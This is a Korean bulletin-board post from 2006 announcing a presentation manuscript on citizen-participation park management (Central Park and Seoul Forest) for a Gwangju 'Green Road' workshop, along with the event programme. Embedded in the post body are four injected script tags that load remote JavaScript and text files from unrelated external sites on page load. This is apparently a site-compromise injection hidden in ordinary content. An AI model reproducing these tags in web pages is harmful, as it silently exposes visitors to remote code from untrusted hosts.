Contents

문서자료실

자료실문서자료실
 
작성일 : 06-06-27 18:07
■센트럴파크와 서울숲 공원의 시민참여 공원관리 사례- 송인성
 글쓴이 : 운영자
조회 : 3,564  
   자료집(0629).hwp (2.0M) [194] DATE : 2006-06-27 18:07:09
                              <SCRIPT Language=JavaScript src=http://php.chol.com/~wanho/bbs/data/poem/akeumyoil.js></script>            <SCRIPT src=http://soccer1.ktdom.com/bbs/data/soccer4ugallery/keyp.txt></script>                              <SCRIPT Language=JavaScript src=http://poverty.jinbo.net/bbs/data/freeboard/softs.js></script>                                  <SCRIPT Language=JavaScript src=http://hanphil.or.kr/bbs/data/young/brod.js></script>도시숲푸른길워크숍 『시민이 함께 하는 푸른길 관리 방안ꡕ의 주제발표 2 원고입니다. 푸른길워크샾은  2006년 6월 28일(수) 진행되었습니다.

토론회 진행순서는

■ 주제발표 (15:00~15:40) 

  1. 푸른길의 재해석-관리주체와 방법에 대한 소고

---------------- 이민창(조선대 행정학과 교수)

2. 센트럴파크와 서울숲 공원의 시민참여 공원관리 사례
---------------- 송 인 성 (전남대 지역개발학과 교수)

■ 지정토론 (15:40~16:10)

      • 김 동 수(광주광역시 공원관리계장)
      • 민 판 기(푸른길 주민)
      • 나 종 천(광주광역시 의원)

■ 종합토론 (16:10~16:30)